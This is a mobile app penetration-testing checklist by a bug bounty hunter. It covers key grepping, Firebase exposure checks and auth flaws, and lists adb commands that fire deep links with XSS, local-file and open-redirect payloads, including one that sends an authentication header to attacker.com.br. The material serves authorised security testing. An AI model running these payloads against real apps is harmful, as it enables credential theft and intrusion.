Mobile hacking

This checklist is designed as a practical cheatsheet for mobile application security testing.
It provides a structured way to quickly review common attack surfaces, identify weak points, and validate security controls in mobile apps.
The goal is efficiency: focus on what matters, minimize noise, and cover the techniques that consistently reveal real issues.

  • folders /assets and /res /raw
  • GREP for sensitive keys using this pattern grep -r 'AIza[0-9A-Za-z\-\_]{35}' .
  • search sensitive .txt files
  • Inspect Manifest.xml file
  • /res/values/strings.xml API keys
  • @xml/network_security_config.xml analysis
  • Test deep links in Manifest.xml
  • verify firebase access to /.json, /Users.json, /Logs.json
  • Check Activities/Services/Intents with adb tool
  • Grep sensitive Keywords in decompiled jar files and apk’s folder
  • Sensitive information disclosed in application error messege
  • Binary reverse engineering
  • Collect URLs and Endpoints from apk
  • Sensitive information disclosed in storage of the mobile device
  • Sensitive information found in logs
  • Sensitive information found in cache
  • Sensitive information found in installed application folder
  • Sensitive information stored in shared preference files

  • Client/Server Side attacks
    • Check for SQL injection
    • XML injection
    • XSS injection
  • App level DOS (long inputs, json dos)
  • Broken Authentication & Authorization
    • Session behavior after pass reset
    • Expired Token can be reused
    • Oauth Flow
    • 2FA bypass
    • Cleartext Transmission
    • Auth bypass using response manipulation
  • Broken Access Control
    • SSRFs
    • Privilege escalations
    • IDORs
    • Unauthorized/Sensitive API calls
  • CAPTCHA implementation flaws & bypass
  • Check for all HTTP methods (PUT, DELETE etc. – use Burp Intruder using HTTP verb tampering)
  • Other user’s sensitive details enumeration
  • Malicious file upload
  • Server side flaws (IIS, APACHE, TOMCAT etc.)

Keywords:


secret
password
user
token
api
key
internal
staging
ftp
ssh
http
.plist
.json
.conf

ADB command to trigger Schemes:

am start -W -a android.intent.action.VIEW -d "custom://intent"

Open redirection + steal credentials

adb shell am start -a android.intent.action.VIEW custom://deeplink?parameter=https://attacker.com.br --ez authentication_header true

Adb to trigger components:

Activity:

adb shell am start -n "com.peirr.test/com.peirr.test.MyActivity" --es name "John" --ei age 30

Broadcast Receiver:

adb shell am broadcast -n "com.peirr.test/com.peirr.test.MyReceiver" --es name "John" --ei age 30

Services:

adb shell am startservice -n "com.peirr.test/com.peirr.test.MyService" --es name "John" --ei age 30

XSS with available parameters:

adb shell am start -n com.company.apk/com.company.mseg.activity.CommonActivity -e url "javascript:alert(1)"

Schemas allowed in Activity:

To reproduce local file access use:

adb shell am start -n com.company.apk/com.company.android.CommonActivity -d "file:///storage/emulated/0/Download/document-blank.pdf"

To reproduce javascript injection:

adb shell am start -n com.company.apk/com.company.android.CommonActivity -d "javascript://example.com%0A alert(1);"

To reproduce open redirect:

adb shell am start -n com.company.apk/com.company.android.CommonActivity -d "http://attacker.com.br"


Daniel_v
Ethical Hacker at
Bugcrowd | Hackerone | YWH HackenProof
Penetration Tester

Awards

Bugcrowd MVP Q4-2022
On Patrol award for #HackUS government campaign at H1
Bugcrowd MVP Q2-2019
Bugcrowd Bounty Slayer Q3-19
Bugcrowd MVP Q3-2019
Bugcrowd MVP Q4-2019
Bugcrowd MVP Q2-2020

View more

Statistics

Top 110 hacker on Bugcrowd
~650 validated reports
~195 companies in Hall of Fame

View more